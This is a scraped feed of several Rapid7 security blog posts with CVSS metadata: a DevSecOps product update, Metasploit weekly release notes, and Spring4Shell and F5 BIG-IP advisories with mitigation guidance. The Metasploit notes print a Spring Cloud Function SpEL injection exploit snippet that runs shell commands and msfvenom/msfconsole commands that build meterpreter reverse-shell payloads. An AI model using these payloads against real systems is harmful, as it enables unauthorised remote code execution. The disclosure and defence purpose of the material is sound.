Taking a [DevSecOps](<https://www.rapid7.com/fundamentals/devsecops/>) approach means baking security across the application lifecycle and includes shifting left whenever possible.\n\n[Dynamic application security testing (DAST)](<https://www.rapid7.com/fundamentals/dast/>) solutions simulate attacks just like the attackers, and they're known for their accuracy and coverage across a wide range of technologies. However, traditional DAST solutions have struggled to work with modern applications and software development methodologies.\n\nSince the launch of InsightAppSec \u2014 Rapid7's industry leading cloud-native DAST \u2014 we've focused on providing coverage of modern applications, as well as being able to integrate as far left as the build process.\n\n> _\u201cOur app developers don't need to come to me, they don't need to come to our team, they don't need to send emails. They don't need to go through any formalities. When they commit code, the scan happens automatically. And, we created the metrics. So, if they see high-rated vulnerabilities they cannot push to production. 
The code will get blocked and they have to remediate it.\"_ \n \n_\\- Midhun Kumar, Head of Infrastructure and Cloud Operations, _[_Pearl Data Direct_](<https://www.rapid7.com/about/customers/pearl-data-direct/>)\n\nBuilding on the success of our [Jenkins Plugin](<https://extensions.rapid7.com/extension/insightappsec-jenkins-plugin>), [Atlassian Bamboo Plugin](<https://extensions.rapid7.com/extension/insightappsec-bamboo-plugin>), and [Azure DevOps](<https://extensions.rapid7.com/extension/insightappsec-azure-devops-extension>) CI/CD integrations, we recently added native [GitHub Actions](<https://github.com/marketplace/actions/rapid7-insightappsec-scan>) and [GitLab CI/CD](<https://extensions.rapid7.com/extension/insightappsec-scan-gitlab>) integrations into InsightAppSec.\n\n### GitHub\n\n[GitHub Actions](<https://github.com/features/actions>) allows development teams to automate software workflows. With our new [InsightAppSec Scan Action for GitHub](<https://www.rapid7.com/blog/post/2022/03/02/insightappsec-github-integration-keeps-risky-code-from-reaching-production/>), you can easily pull down the repo and add it to your DevOps pipelines. As part of your actions, you can trigger the InsightAppSec scan and have the results passed back into GitHub actions. If you want, you can add scan gating to prevent vulnerable code from being deployed to production.\n\nThis is available for no additional cost in the [GitHub Marketplace](<https://github.com/marketplace/actions/rapid7-insightappsec-scan>).\n\n### GitLab\n\n[GitLab CI/CD](<https://about.gitlab.com/stages-devops-lifecycle/continuous-integration/>) can automatically build, test, deploy, and monitor your applications. With our new InsightAppSec Scan Job, you can add a Docker command in your pipeline to trigger a scan. 
The results are sent back, and you can add scan gating to prevent vulnerable code from being deployed to production.\n\nThe feature is available for no additional cost, and we have resources to help you learn [how to setup the GitLab integration](<https://docs.rapid7.com/insightappsec/gitlab-integration/>).\n\n## Spring4Shell testing and protection\n\n[CVE-2022-22965](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>), a zero-day vulnerability announced on April 1st, is no April Fools' Day joke. While it's not as dreadful as [Log4Shell](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>), it should still be patched, and there are reports of the Spring4Shell flaw being used to install the Mirai Botnet malware.\n\nTo help our customers secure their applications and understand their risk from Spring4Shell, Rapid7 released [new capabilities](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>), including:\n\n * New RCE Attack Module for Spring4Shell (InsightAppSec)\n * New Block Rule for Spring4Shell (tCell)\n * New Detection of CVE-2022-22965 in running applications (tCell)\n\n## Other enhancements\n\nInsightAppSec comes with the ability to create custom dashboards to quickly view and get insights on the risk and status of your program. Relying on feedback from customers, we recently added the ability to create dashboards based on certain apps or groups of apps. This allows you to quickly view risk in context of what matters.\n\nCustomers often like to manage their applications at scale, and one of the easiest ways to do that is via the tCell API. Significant feature enhancements include App Firewall event and block rules, OS commands, Local Files, suspicious actors, and more have all been added or updated. 
Check out our [API documentation](<https://docs.rapid7.com/tcell/api/>).\n\nRapid7's application security portfolio can help you shift left as well as shift right, depending on your needs and the status of your program. You can integrate InsightAppSec DAST into your CI/CD pipelines before deployment to production. And with tCell, you can add web application and API protection for your production environments.\n\nStay tuned for all we have in store in Q2!\n\n_**Additional reading**_\n\n * _[Securing Your Applications Against Spring4Shell (CVE-2022-22965)](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>)_\n * _[InsightAppSec GitHub Integration Keeps Risky Code From Reaching Production](<https://www.rapid7.com/blog/post/2022/03/02/insightappsec-github-integration-keeps-risky-code-from-reaching-production/>)_\n * _[How InsightAppSec Detects Log4Shell: Your Questions Answered](<https://www.rapid7.com/blog/post/2022/02/15/how-insightappsec-detects-log4shell-your-questions-answered/>)_\n * _[A Dream Team-Up: Integrate InsightAppSec With ServiceNow ITSM](<https://www.rapid7.com/blog/post/2021/12/08/a-dream-team-up-integrate-insightappsec-with-servicenow-itsm/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-15T14:22:55", "type": "rapid7blog", "title": "Let's Dance: InsightAppSec and tCell Bring New DevSecOps Improvements in Q1", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22965"], "modified": "2022-04-15T14:22:55", "id": "RAPID7BLOG:D185BF677E20E357AFE422CFB80809A5", "href": "https://blog.rapid7.com/2022/04/15/lets-dance-insightappsec-and-tcell-bring-new-devsecops-improvements-in-q1/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-06T16:15:25", "description": "## CVE-2022-22963 - Spring Cloud Function SpEL RCE\n\n\n\nA new `exploit/multi/http/spring_cloud_function_spel_injection` module has been developed by our very own [Spencer McIntyre](<https://github.com/smcintyre-r7>) which targets Spring Cloud Function versions Prior to 3.1.7 and 3.2.3. This module is unrelated to [Spring4Shell CVE-2022-22965](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>), which is a separate vulnerability in the WebDataBinder component of Spring Framework.\n\nThis exploit works by crafting an unauthenticated HTTP request to the target application. When the `spring.cloud.function.routing-expression` HTTP header is received by the server it will evaluate the user provided SpEL (Spring Expression Language) query, leading to remote code execution. 
This can be seen within the [CVE-2022-22963 Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/16395/files#diff-85438aef360f2d47359f2cb9d7f9f52465f8bc23f2d9b6fa04fc4fef6eef69dbR109-R111>):\n \n \n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI']),\n 'headers' => {\n 'spring.cloud.function.routing-expression' => \"T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub(\"'\", \"''\")}'})\"\n }\n )\n \n\nBoth patched and unpatched servers will respond with a 500 server error and a JSON-encoded message.\n\n## New module content (1)\n\n * [Spring Cloud Function SpEL Injection](<https://github.com/rapid7/metasploit-framework/pull/16395>) by Spencer McIntyre, hktalent, and m09u3r, which exploits [CVE-2022-22963](<https://attackerkb.com/topics/1RIGeNMYFk/cve-2022-22963?referrer=blog>) \\- This achieves unauthenticated remote code execution by executing SpEL (Spring Expression Language) queries against Spring Cloud Function versions prior to `3.1.7` and `3.2.3`.\n\n## Bugs fixed (2)\n\n * [#16364](<https://github.com/rapid7/metasploit-framework/pull/16364>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a fix for a crash in `auxiliary/spoof/dns/native_spoofer` and adds documentation for the module.\n * [#16386](<https://github.com/rapid7/metasploit-framework/pull/16386>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a crash when running the `exploit/multi/misc/java_rmi_server` module against a target server, such as Metasploitable2.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.35...6.1.36](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-03-24T13%3A07%3A34-04%3A00..2022-03-31T11%3A00%3A06-05%3A00%22>)\n * [Full diff 
6.1.35...6.1.36](<https://github.com/rapid7/metasploit-framework/compare/6.1.35...6.1.36>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T18:34:29", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T18:34:29", "id": "RAPID7BLOG:F708A09CA1EFFC0565CA94D5DBC414D5", "href": "https://blog.rapid7.com/2022/04/01/metasploit-weekly-wrap-up-155/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-07T13:29:14", "description": "\n\nWe have completed remediating the instances of Spring4Shell 
(CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that we found on our internet-facing services and systems. We continue to monitor for new vulnerability instances and to remediate vulnerabilities on internally accessible services. We also continue to monitor our environment for anomalous activity, having found none so far. No action is required by our customers at this time.\n\n## Further reading and recommendations\n\nOur Emergent Threat Response team has put together a [detailed blog post](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) with general guidance about how to mitigate and remediate Spring4Shell. We will continue updating that post as we learn more about Spring4Shell and new remediation and mitigation approaches.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T14:42:42", "type": "rapid7blog", "title": "Update on Spring4Shell\u2019s Impact on Rapid7 Solutions and Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T14:42:42", "id": "RAPID7BLOG:46F0D57262DABE81708D657F2733AA5D", "href": "https://blog.rapid7.com/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-13T17:31:10", "description": "## Spring4Shell module\n\n\n\nCommunity contributor [vleminator](<https://github.com/vleminator>) added [a new module](<https://github.com/rapid7/metasploit-framework/pull/16423>) which exploits [CVE-2022-22965](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965?referrer=blog>)\u2014more commonly known as \"Spring4Shell.\" [Depending on its deployment configuration](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965/rapid7-analysis?referrer=blog>), Java Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older can be vulnerable to unauthenticated remote code execution.\n\n## F5 BIG-IP iControl RCE via REST Authentication Bypass module\n\nIn addition, we have [a new module](<https://github.com/rapid7/metasploit-framework/pull/16549>) that targets F5 iControl and exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>), from contributor [heyder](<https://github.com/heyder>). This vulnerability allows attackers to bypass iControl's REST authentication on [affected versions](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388/rapid7-analysis?referrer=blog>) and achieve unauthenticated remote code execution as `root` via the `/mgmt/tm/util/bash` endpoint.\n\n## Cisco RV340 SSL VPN RCE module\n\nThe last of the new RCE modules this week\u2014community contributor [pedrib](<https://github.com/pedrib>) added [a Cisco RV340 SSL VPN module](<https://github.com/rapid7/metasploit-framework/pull/16169>), which exploits [CVE-2022-20699](<https://attackerkb.com/topics/KEaCoCGQkx/cve-2022-20699?referrer=blog>). 
This module exploits a stack buffer overflow in the default configuration of Cisco RV series routers, and does not require authentication. This module also works over the internet and does not require local network access.\n\n## First Class PowerShell Command Payloads\n\nMetasploit has had the ability to execute native 64-bit and 32-bit Windows payloads for quite some time. This functionality was exposed to module authors by way of a mixin which meant that a dedicated target needed to be written. This placed an additional development burden on module authors who wanted to offer powershell commands for in-memory code execution of native payloads. Now module authors can just define the standard command target, and users can select one of the new `cmd/windows/powershell*` payloads. The new adapter will convert the native code into a powershell command automatically, without additional effort from the module developer.\n\nSince these are new payload modules, they can also be generated directly using MSFVenom:\n \n \n ./msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=192.168.159.128\n \n\nThis is similar to using one of the `psh-` formatters with the existing `-f` option. However, because it\u2019s a payload module, the additional [Powershell specific options](<https://github.com/rapid7/metasploit-framework/blob/93a7ae26a1e85f82de8647460a0c245bf95e6b00/lib/msf/core/exploit/powershell.rb#L10>) are accessible. 
For example, the resulting command can be base64-encoded to remove many special characters by setting `Powershell::encode_final_payload=true`.\n\n## New module content (4)\n\n * [F5 BIG-IP iControl RCE via REST Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/16549>) by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>) \\- A new module has been added for CVE-2022-1388, a vulnerability in F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions. By making a special request, one can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the `root` user on affected systems.\n * [Cisco RV340 SSL VPN RCE](<https://github.com/rapid7/metasploit-framework/pull/16169>) from [pedrib](<https://github.com/pedrib>), which exploits [CVE-2022-20699](<https://attackerkb.com/topics/KEaCoCGQkx/cve-2022-20699?referrer=blog>) \\- A new module has been added which exploits CVE-2022-20699, an unauthenticated stack overflow RCE vulnerability in the Cisco RV 340 VPN Gateway router. Successful exploitation results in RCE as the `root` user. This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.\n * [Spring Framework Class property RCE (Spring4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16423>) by [vleminator](<https://github.com/vleminator>), which exploits [CVE-2022-22965](<https://attackerkb.com/topics/xtgLfwQYBm/cve-2022-22965?referrer=blog>) \\- This adds a module that targets CVE-2022-22965, a remote code execution vulnerability in some installations of Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older. 
To be vulnerable, the application must be running on JDK 9+ and in this case, packaged and deployed as a `war` file, though it may be possible to bypass these limitations later.\n * [Powershell Command Adapter](<https://github.com/rapid7/metasploit-framework/pull/16548>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds a new payload adapter for converting native x86 and x64 Windows payloads to command payloads using Powershell.\n\n## Enhancements and features (4)\n\n * [#16529](<https://github.com/rapid7/metasploit-framework/pull/16529>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This updates Mettle payloads to support logging to file and now uses the same options as the other Meterpreters. For example within msfconsole:\n \n \n use osx/x64/meterpreter_reverse_tcp\n generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt'\n to_handler\n \n\n * [#16538](<https://github.com/rapid7/metasploit-framework/pull/16538>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The Python Meterpreter loader library has been updated to address deprecation warnings that were showing when running these payloads using Python 3.4 and later.\n * [#16551](<https://github.com/rapid7/metasploit-framework/pull/16551>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The documentation for tomcat_mgr_upload.rb has been updated to include additional information on setting up a vulnerable Docker instance to test the module on.\n * [#16553](<https://github.com/rapid7/metasploit-framework/pull/16553>) from [mauvehed](<https://github.com/mauvehed>) \\- This updates Metasploit's `.github/SECURITY.md` file with the latest steps to follow when raising security issues with Rapid7's open source projects.\n\n## Bugs fixed (8)\n\n * [#16485](<https://github.com/rapid7/metasploit-framework/pull/16485>) from [jeffmcjunkin](<https://github.com/jeffmcjunkin>) \\- This updates the version check for the 
`exploit/windows/local/s4u_persistence` module to allow it to run on later Windows versions.\n * [#16491](<https://github.com/rapid7/metasploit-framework/pull/16491>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a bug whereby Meterpreter sessions and modules would crash when encountering a timeout issue due to using an invalid or deprecated error name.\n * [#16531](<https://github.com/rapid7/metasploit-framework/pull/16531>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a crash in various pihole modules when login authentication is required.\n * [#16533](<https://github.com/rapid7/metasploit-framework/pull/16533>) from [cdelafuente-r7](<https://github.com/cdelafuente-r7>) \\- This updates the Meterpreter reg command to correctly handle setting the KEY_WOW64 flag with `-w 32` or `-w 64` \\- previously these flag values were unintentionally ignored.\n * [#16540](<https://github.com/rapid7/metasploit-framework/pull/16540>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes an issue with Zeitwerk trying to load Go packages as part of the boot up process.\n * [#16542](<https://github.com/rapid7/metasploit-framework/pull/16542>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This fixes a bug in msfconsole's internal book keeping to ensure that closed channels are no longer tracked.\n * [#16544](<https://github.com/rapid7/metasploit-framework/pull/16544>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This updates post module `windows/gather/ad_to_sqlite` to no longer crash. 
The module will now additionally store the extracted information as loot.\n * [#16560](<https://github.com/rapid7/metasploit-framework/pull/16560>) from [Ronni3X](<https://github.com/Ronni3X>) \\- This updates the `nessus_connect` login functionality to correctly handle the `@` symbol being present in the password.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.41...6.1.42](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-05-05T11%3A16%3A04-05%3A00..2022-05-12T07%3A30%3A04-05%3A00%22>)\n * [Full diff 6.1.41...6.1.42](<https://github.com/rapid7/metasploit-framework/compare/6.1.41...6.1.42>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T16:52:59", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-20699", "CVE-2022-22965"], "modified": "2022-05-13T16:52:59", "id": "RAPID7BLOG:1C4EBCEAFC7E54954F827CAEDB3291DA", "href": "https://blog.rapid7.com/2022/05/13/metasploit-weekly-wrap-up-156/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T19:31:05", "description": "\n\nOn May 4, 2022, F5 released [an advisory](<https://support.f5.com/csp/article/K55879220>) listing several vulnerabilities, including [CVE-2022-1388](<https://support.f5.com/csp/article/K23605346>), a critical authentication bypass that leads to remote code execution in iControl REST with a CVSSv3 base score of 9.8.\n\nThe vulnerability affects several different versions of BIG-IP prior to 17.0.0, including:\n\n * F5 BIG-IP 16.1.0 - 16.1.2 (patched in 16.1.2.2)\n * F5 BIG-IP 15.1.0 - 15.1.5 (patched in 15.1.5.1)\n * F5 BIG-IP 14.1.0 - 14.1.4 (patched in 14.1.4.6)\n * F5 BIG-IP 13.1.0 - 13.1.4 (patched in 13.1.5)\n * F5 BIG-IP 12.1.0 - 12.1.6 (no patch available, will not fix)\n * F5 BIG-IP 11.6.1 - 11.6.5 (no patch available, will not fix)\n\nOn Monday, May 9, 2022, [Horizon3](<https://www.horizon3.ai/>) released a [full proof of concept](<https://github.com/horizon3ai/CVE-2022-1388>), which we successfully executed to get a root shell. Other groups have [developed exploits](<https://www.bleepingcomputer.com/news/security/exploits-created-for-critical-f5-big-ip-flaw-install-patch-immediately/>) as well.\n\nOver the past few days, [BinaryEdge](<https://www.binaryedge.io/>) has detected an increase in [scanning and exploitation](<https://twitter.com/Balgan/status/1523683322446381059>) for F5 BIG-IP. 
Others on Twitter have also [observed exploitation attempts](<https://twitter.com/1ZRR4H/status/1523572874061422593>). Due to the ease of exploiting this vulnerability, the public exploit code, and the fact that it provides root access, exploitation attempts are likely to increase.\n\nWidespread exploitation is somewhat mitigated by the small number of internet-facing F5 BIG-IP devices, however: our best guess is that there are only [about 2,500 targets on the internet](<https://twitter.com/Junior_Baines/status/1522205355287228416>).\n\n## Mitigation guidance\n\nF5 customers should patch their BIG-IP devices as quickly as possible using [F5's upgrade instructions](<https://support.f5.com/csp/article/K84205182>). Additionally, the management port for F5 BIG-IP devices (and any similar appliance) should be tightly controlled at the network level \u2014 only authorized users should be able to reach the management interface at all.\n\nF5 also [provides a workaround as part of their advisory](<https://support.f5.com/csp/article/K23605346>). If patching and network segmentation are not possible, the workaround should prevent exploitation. We always advise patching rather than relying solely on workarounds.\n\nExploit attempts appear in at least [two different log files](<https://twitter.com/n0x08/status/1523701663290122240>):\n\n * /var/log/audit\n * /var/log/restjavad-audit.0.log\n\nBecause this vulnerability is a root compromise, successful exploitation may be very difficult to recover from. At a minimum, affected BIG-IP devices should be rebuilt from scratch, and certificates and passwords should be rotated.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-1388 with an authenticated [vulnerability check](<https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2022-1388/>) in the May 5, 2022 content release. 
This release also includes authenticated vulnerability checks for additional CVEs in F5's [May 2022 security advisory](<https://support.f5.com/csp/article/K55879220>).\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954](<https://www.rapid7.com/blog/post/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/>)_\n * _[Opportunistic Exploitation of WSO2 CVE-2022-29464](<https://www.rapid7.com/blog/post/2022/04/22/opportunistic-exploitation-of-wso2-cve-2022-29464/>)_\n * _[Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>)_\n * _[CVE-2022-0847: Arbitrary File Overwrite Vulnerability in Linux Kernel](<https://www.rapid7.com/blog/post/2022/03/09/cve-2022-0847-arbitrary-file-overwrite-vulnerability-in-linux-kernel/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T17:57:00", "type": "rapid7blog", "title": "Active Exploitation of F5 BIG-IP iControl REST CVE-2022-1388", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0847", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22965", "CVE-2022-29464"], "modified": "2022-05-09T17:57:00", "id": "RAPID7BLOG:07CA09B4E3B3835E096AA56546C43E8E", "href": "https://blog.rapid7.com/2022/05/09/active-exploitation-of-f5-big-ip-icontrol-rest-cve-2022-1388/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-08T21:29:15", "description": "\n\n_Rapid7 has completed remediating the instances of Spring4Shell (CVE-2022-22965) and Spring Cloud (CVE-2022-22963) vulnerabilities that we found on our internet-facing services and systems. For further information and updates about our internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>)._\n\nIf you are like many in the cybersecurity industry, any mention of a zero-day in an open-source software (OSS) library may cause a face-palm or audible groans, especially given the fast-follow from the [Log4j vulnerability](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>). While discovery and research is evolving, we\u2019re posting the facts we\u2019ve gathered and updating guidance as new information becomes available.\n\n## What Rapid7 Customers Can Expect\n\nThis is an evolving incident. Our team is continuing to investigate and validate additional information about this vulnerability and its impact. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+. 
CVE-2022-22965 was assigned to track the vulnerability on March 31, 2022.\n\nOur team will be updating this blog continually\u2014please see the bottom of the post for updates.\n\n### Vulnerability Risk Management\n\nThe April 1, 2022 content update released at 7:30 PM EDT contains authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release the week of April 11 to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable. We also have an authenticated Windows check available as of the April 7th content release, which requires the April 6th 